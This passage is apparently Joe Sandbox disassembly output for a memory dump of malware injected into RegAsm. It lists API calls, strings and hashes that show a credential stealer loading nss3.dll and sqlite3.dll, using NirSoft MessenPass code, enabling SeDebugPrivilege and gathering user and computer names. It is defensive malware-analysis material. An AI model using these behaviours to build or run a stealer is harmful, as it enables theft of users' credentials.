                                                                                                                                              • sprintf.MSVCRT ref: 0040B929
                                                                                                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                              • sprintf.MSVCRT ref: 0040B953
                                                                                                                                              • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 203655857-0
                                                                                                                                              • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                              • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                              • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                              • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040ADE8
                                                                                                                                              • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                              • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                              • String ID: </%s>
                                                                                                                                              • API String ID: 3699762281-259020660
                                                                                                                                              • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                              • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                              • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                              • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                              Strings
                                                                                                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                              • String ID: recovered %d pages from %s
                                                                                                                                              • API String ID: 985450955-1623757624
                                                                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _ultoasprintf
                                                                                                                                              • String ID: %s %s %s
                                                                                                                                              • API String ID: 432394123-3850900253
                                                                                                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00409919
                                                                                                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendmemset
                                                                                                                                              • String ID: N\@
                                                                                                                                              • API String ID: 568519121-3851889168
                                                                                                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                              • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                              APIs
                                                                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                              • String ID: menu_%d
                                                                                                                                              • API String ID: 1129539653-2417748251
                                                                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _msizerealloc
                                                                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                                                                              • API String ID: 2713192863-2134078882
                                                                                                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                              • strrchr.MSVCRT ref: 00409808
                                                                                                                                              • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                              • String ID: _lng.ini
                                                                                                                                              • API String ID: 3334749609-1948609170
                                                                                                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                              • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                              APIs
                                                                                                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                                                                              • String ID: sqlite3.dll
                                                                                                                                              • API String ID: 1983510840-1155512374
                                                                                                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                              • API String ID: 1029625771-543337301
                                                                                                                                              • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                              • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                              • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                              • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileString
                                                                                                                                              • String ID: A4@$Server Details
                                                                                                                                              • API String ID: 1096422788-4071850762
                                                                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                              • memset.MSVCRT ref: 0042C932
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                              • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                              APIs
                                                                                                                                              • strlen.MSVCRT ref: 0040849A
                                                                                                                                              • memset.MSVCRT ref: 004084D2
                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3110682361-0
                                                                                                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                              • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                              • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                              • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                              • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                              APIs
                                                                                                                                              • strlen.MSVCRT ref: 0040797A
                                                                                                                                              • free.MSVCRT ref: 0040799A
                                                                                                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                              • free.MSVCRT ref: 004079BD
                                                                                                                                              • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3669619086-0
                                                                                                                                              • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                              • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                              • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                              • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 362 410de1-410e00 GetCurrentProcess call 410daa 365 410e02-410e08 GetLastError 362->365 366 410e0a-410e1b call 410d8a 362->366 367 410e82-410e84 365->367 370 410e36-410e51 call 410d8a 366->370 371 410e1d-410e28 366->371 376 410e53-410e5e 370->376 377 410e6d-410e81 CloseHandle 370->377 371->370 375 410e2a-410e34 LookupPrivilegeValueA 371->375 375->370 376->377 380 410e60-410e6b AdjustTokenPrivileges 376->380 377->367 380->377
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00410E02
                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 00410E78
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessTokenValue
                                                                                                                                              • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                                                                                                                              • API String ID: 2501698957-164648368
                                                                                                                                              • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                                                                                                                              • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                                                                                                                              • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                                                                                                                              • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                              • strlen.MSVCRT ref: 004078FC
                                                                                                                                              • strlen.MSVCRT ref: 00407904
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 379999529-0
                                                                                                                                              • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                              • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                              • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                              • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                                                                • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                                                                • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040C6A7
                                                                                                                                              • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                                                                                                                              • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeMessage$EnumLoadResourceTypes
                                                                                                                                              • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                                                                                                                              • API String ID: 3379502781-3807849023
                                                                                                                                              • Opcode ID: bbacde5a5cd21ba3b0067782a62bd30c38fe63f76bbb2082e6cf8d62c0ef1d45
                                                                                                                                              • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
                                                                                                                                              • Opcode Fuzzy Hash: bbacde5a5cd21ba3b0067782a62bd30c38fe63f76bbb2082e6cf8d62c0ef1d45
                                                                                                                                              • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 97 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 98 407dc4 97->98 99 407df8-407dfb 97->99 100 407dca-407dd3 98->100 101 407e2c-407e30 99->101 102 407dfd-407e06 99->102 103 407dd5-407dd9 100->103 104 407dda-407df6 100->104 105 407e08-407e0c 102->105 106 407e0d-407e2a 102->106 103->104 104->99 104->100 105->106 106->101 106->102
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00407CDB
                                                                                                                                              • memset.MSVCRT ref: 00407CEF
                                                                                                                                              • memset.MSVCRT ref: 00407D09
                                                                                                                                              • memset.MSVCRT ref: 00407D1E
                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                              • strlen.MSVCRT ref: 00407D91
                                                                                                                                              • strlen.MSVCRT ref: 00407DA0
                                                                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                                                                              • API String ID: 1832431107-3760989150
                                                                                                                                              • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                              • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                              • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                              • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
